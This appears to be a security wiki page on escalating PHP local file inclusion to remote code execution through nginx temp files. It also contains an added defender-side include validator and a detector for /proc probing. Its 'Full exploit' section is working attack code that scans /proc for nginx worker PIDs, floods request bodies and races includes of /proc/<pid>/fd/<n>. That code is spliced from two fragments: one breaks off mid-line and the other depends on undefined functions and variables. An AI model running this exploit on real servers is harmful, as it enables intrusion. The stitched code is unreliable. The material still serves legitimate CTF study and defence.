# LFI2RCE via Nginx temp files
## Vulnerable configuration

[**Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)

* PHP code:

* Open file descriptors of the nginx worker process (`/proc/34/fd` in the note below):

```
... -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```

Note: `/proc/34/fd/15` cannot be included directly in this example, because PHP's `include` function would resolve the path to `/var/lib/nginx/body/0000001368 (deleted)`, which does not exist in the filesystem. Fortunately, this minor restriction can be bypassed with some indirection such as `/proc/self/fd/34/../../../34/fd/15`, which ends up executing the content of the deleted file `/var/lib/nginx/body/0000001368`.
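As an added defender-side example (not code from the original page or from the bierbaumer.net write-up), the following Python shows the two server-side checks a practitioner would want against the pattern above: a purely lexical, allowlist-based resolution of the `file` parameter that rejects both the direct `/proc/34/fd/15` path and the `/proc/self/fd/34/../../../34/fd/15` indirection before anything reaches `include`, and a classifier that labels query strings touching `/proc/<pid>/cmdline` (the worker-PID enumeration) or `/proc/<pid>/{fd,cwd,root}` (the descriptor probing) for alerting. The web root `/var/www/html/pages`, the page names and the sample query strings are constructed assumptions.

```python
import os
import re
from typing import Optional
from urllib.parse import parse_qs

# Constructed defender-side example; the web root and page names are
# assumptions, not values from the original write-up.
PAGE_ROOT = "/var/www/html/pages"
ALLOWED_PAGES = {"index.php", "about.php", "contact.php"}

# The two request shapes the nginx-temp-file technique produces: enumerating
# /proc/<pid>/cmdline to find nginx workers, then including /proc/<pid>/fd/<n>
# (optionally behind /proc/<pid>/cwd or /proc/<pid>/root prefixes).
PID_ENUMERATION_RE = re.compile(r"/proc/(?:self|\d+)/cmdline")
PROC_FD_RE = re.compile(r"/proc/(?:self|\d+)/(?:fd|cwd|root)(?:/|$)")


def resolve_include(requested: str, page_root: str = PAGE_ROOT) -> Optional[str]:
    """Return the file that may be included, or None to reject the request.

    The resolution is purely lexical (os.path.normpath never touches the
    filesystem), so it cannot be steered through the /proc/<pid>/fd/<n>
    symlinks that PHP's include() would follow.
    """
    if not requested or "\x00" in requested:
        return None
    # os.path.join discards page_root when the second argument is absolute,
    # so an absolute request must be refused explicitly.
    if requested.startswith("/"):
        return None
    candidate = os.path.normpath(os.path.join(page_root, requested))
    # After normpath every ".." is folded; a candidate outside page_root is an
    # escape attempt (e.g. ../../../../proc/34/fd/15 -> /proc/34/fd/15).
    if os.path.commonpath([page_root, candidate]) != page_root:
        return None
    # Only top-level, explicitly allowlisted page names are ever included.
    if os.path.dirname(candidate) != page_root:
        return None
    if os.path.basename(candidate) not in ALLOWED_PAGES:
        return None
    return candidate


def classify_query(query_string: str) -> str:
    """Label a request's query string for detection purposes.

    Returns "pid_enumeration", "proc_fd_probe" or "clean". parse_qs already
    percent-decodes, so %2Fproc%2F... is inspected as /proc/...
    """
    params = parse_qs(query_string, keep_blank_values=True)
    for values in params.values():
        for value in values:
            if PID_ENUMERATION_RE.search(value):
                return "pid_enumeration"
            if PROC_FD_RE.search(value):
                return "proc_fd_probe"
    return "clean"


if __name__ == "__main__":
    # Constructed sample query strings modelled on the requests the technique needs.
    samples = [
        "file=about.php",
        "file=/proc/1234/cmdline",
        "file=/proc/self/fd/34/../../../34/fd/15",
        "file=%2Fproc%2F1234%2Fcwd%2Fproc%2F34%2Ffd%2F15",
    ]
    for q in samples:
        print(f"{q:55} -> {classify_query(q)}")
    for req in ("about.php", "/proc/34/fd/15", "../../../../proc/34/fd/15"):
        print(f"include {req!r:35} -> {resolve_include(req)}")
```

`resolve_include` deliberately refuses absolute paths and anything that normalises outside the page root instead of trying to pattern-match `/proc`; the regex-based `classify_query` is the complementary monitoring view, useful on access logs where a PID scan of `/proc/<pid>/cmdline` up to `pid_max` stands out as a high-volume burst from one client.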
## Full exploit

```python
#!/usr/bin/env python3
import sys, threading, requests

# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details

URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'

# find nginx worker processes
r = requests.get(URL, params={
    'file': '/proc/cpuinfo'
})
cpus = r.text.count('processor')

r = requests.get(URL, params={
    'file': '/proc/sys/kernel/pid_max'
})
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')

nginx_workers = []
for pid in range(pid_max):
    r = requests.get(URL, params={
        'file': f'/proc/{pid}/cmdline'
    })

    if b'nginx: worker process' in r.content:
        print(f'[*] worker nginx trovato: {pid}')

        nginx_workers.append(pid)
        if len(nginx_workers) >= cpus:
            break

done = False

# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
    print('[+] avvio uploader')
    while not done:
        requests.get(URL, data=' //'
```

```python
        requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
    except:
        pass


def send_payload_worker(requests_session):
    while True:
        send_payload(requests_session)


def send_payload_multiprocess(requests_session):
    # Use all CPUs to send the payload as request body for Nginx
    for _ in range(multiprocessing.cpu_count()):
        p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
        p.start()


def generate_random_path_prefix(nginx_pids):
    # This method creates a path from a random number of ProcFS path components.
    # A generated path will look like /proc//cwd/proc//root/proc//root
    path = ""
    component_num = random.randint(0, 10)
    for _ in range(component_num):
        pid = random.choice(nginx_pids)
        if random.randint(0, 1) == 0:
            path += f"/proc/{pid}/cwd"
        else:
            path += f"/proc/{pid}/root"

    return path


def read_file(requests_session, nginx_pid, fd, nginx_pids):
    nginx_pid_list = list(nginx_pids)
    while True:
        path = generate_random_path_prefix(nginx_pid_list)
        path += f"/proc/{nginx_pid}/fd/{fd}"
        try:
            d = requests_session.get(SERVER + f"/?action=include&file={path}").text
        except:
            continue
        # Flags are formatted as hxp{}
        if "hxp" in d:
            print("Flag trovata! ")
            print(d)


def read_file_worker(requests_session, nginx_pid, nginx_pids):
    # Scan Nginx FDs between 10 - 45 in a loop.
    # Since files and sockets keep closing, it is very common for the request body FD to open within this range
    for fd in range(10, 45):
        thread = threading.Thread(target=read_file, args=(requests_session, nginx_pid, fd, nginx_pids))
        thread.start()


def read_file_multiprocess(requests_session, nginx_pids):
    for nginx_pid in nginx_pids:
        p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
        p.start()


if __name__ == "__main__":
    print('[DEBUG] Creazione della sessione di richieste')
    requests_session = create_requests_session()
    print('[DEBUG] Ottenimento dei pid di Nginx')
    nginx_pids = get_nginx_pids(requests_session)
    print(f'[DEBUG] Pid di Nginx: {nginx_pids}')
    print('[DEBUG] Inizio dell\'invio del payload')
    send_payload_multiprocess(requests_session)
    print('[DEBUG] Inizio dei lettori di fd')
    read_file_multiprocess(requests_session, nginx_pids)
```

## Labs

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)

## References

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)